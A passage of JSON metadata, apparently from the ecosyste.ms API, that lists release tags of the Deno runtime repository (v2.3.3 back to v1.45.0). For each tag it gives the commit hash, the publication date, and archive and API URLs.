dencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.m